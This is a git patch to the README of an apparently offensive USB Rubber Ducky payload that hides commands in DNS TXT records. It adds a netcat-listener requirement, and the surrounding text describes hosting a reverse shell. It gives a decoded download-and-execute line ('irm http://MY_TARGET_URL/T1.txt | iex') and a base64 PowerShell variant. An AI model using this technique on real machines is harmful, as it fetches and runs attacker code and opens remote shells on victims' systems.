From 13355e851991a1656d2a631990293b83583e6576 Mon Sep 17 00:00:00 2001 From: Nate <101878955+nathansb2022@users.noreply.github.com> Date: Sat, 3 Aug 2024 23:43:50 -0500 Subject: [PATCH] Update README.md --- payloads/library/execution/DNS-TXT-CommandInection/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/payloads/library/execution/DNS-TXT-CommandInection/README.md b/payloads/library/execution/DNS-TXT-CommandInection/README.md index e03eb47..9cc06f5 100644 --- a/payloads/library/execution/DNS-TXT-CommandInection/README.md +++ b/payloads/library/execution/DNS-TXT-CommandInection/README.md @@ -5,8 +5,10 @@ A usb rubber ducky payload that leverages DNS TXT records to perform command inj ## Requirements A domain with the ability to manipulate the DNS TXT records. Web Server hosting the payload. In this example, python3 http.server was used to host a reverseshell. +A listener for incoming connections like netcat. Provide URL used for Example DEFINE #MY_TARGET_URL example.com + ## Notes No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record. Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"